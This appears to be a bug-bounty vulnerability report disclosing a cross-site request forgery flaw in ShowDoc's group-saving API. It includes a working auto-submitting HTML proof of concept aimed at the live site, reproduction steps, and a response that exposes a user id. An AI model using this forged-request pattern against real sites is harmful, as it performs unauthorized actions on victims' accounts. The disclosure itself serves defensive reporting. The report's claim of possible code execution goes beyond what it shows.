Description

An attacker is able to create a new group for any item if users visit the attacker’s website. Furthermore, the user-id “uid” is also exposed via the JSON response.

We can bypass the CSRF Protection if we put our payload on an iframe or an HTML file and then send them to the victim.

Proof of Concept

Poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
      <input type="hidden" name="group_name" value="testcsrf" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="item_ids" value="1704644990568304" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce

1.Open the PoC.html in any browser.
2.Now you can check that a new group named testcsrf is created with the item that has id=1704644990568304 is added to that group.
Furthermore, the user id uid is also exposed via the JSON response:

{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}

Video PoC

You can check my video PoC here: PoC

Impact

This can result in the exposure of data or unintended code execution.